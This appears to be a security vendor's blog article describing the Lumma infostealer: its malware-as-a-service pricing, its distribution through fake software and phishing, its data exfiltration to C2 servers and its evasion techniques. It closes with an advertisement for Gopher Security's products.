Large-Scale Lumma Infostealer Campaign Abuses GitHub for Malware

The Rise of Lumma Info Stealer

Lumma Info Stealer

The Malware-as-a-Service (MaaS) model is providing cybercriminals with accessible and sophisticated tools for executing cyber attacks. One notable example is the Lumma info stealer, which has been operational since 2022, targeting sensitive data such as login credentials and banking information. This malware is distributed on dark web forums and has seen increased visibility with various command-and-control (C2) servers identified.

Lumma Info Stealer Background

Lumma, also known as LummaC2, is marketed to threat actors with tiered subscription models, making it affordable for even novice attackers. Priced from USD 250, it has gained traction in marketplaces alongside other info stealers like Vidar and Racoon. The malware primarily targets cryptocurrency wallets and two-factor authentication (2FA) extensions, indicating a focus on high-value targets.

Attack Vectors and Distribution Methods

Lumma has been distributed through various deceptive methods, including masquerading as popular software like VLC or ChatGPT. Attackers also exploit phishing emails, often impersonating legitimate companies such as Bandai Namco to lure victims into executing malicious payloads. The malware targets Windows operating systems and multiple browsers, including Chrome and Firefox, to exfiltrate sensitive information.

Malicious Email Example

Data Exfiltration Techniques

Once Lumma is successfully executed, it employs HTTP POST requests to transmit stolen data to its C2 servers. Darktrace observed various devices infected with Lumma communicating with known C2 infrastructure, revealing a pattern of data exfiltration activities. The malware is capable of accessing and stealing browser data, cookies, and sensitive information from applications like AnyDesk and KeePass.

Device Event Log

Evasion Techniques and Defense Recommendations

Lumma employs various evasion techniques to avoid detection by security systems, including using obfuscation and encryption to mask payloads and leveraging trusted binaries like mshta.exe and wscript.exe to execute malicious code. Organizations are urged to adopt advanced security measures, such as Gopher Security's AI-Powered Zero Trust Platform, to enhance their defenses against evolving threats like Lumma.

Future Outlook

As cyber threats become more sophisticated, organizations need to focus on proactive risk management strategies. Gopher Security provides services like Cloud Access Security Broker and AI Inspection Engine for Traffic Monitoring to help businesses detect and respond to such threats effectively.

Explore our services at Gopher Security to safeguard your organization against the rising tide of cyber threats.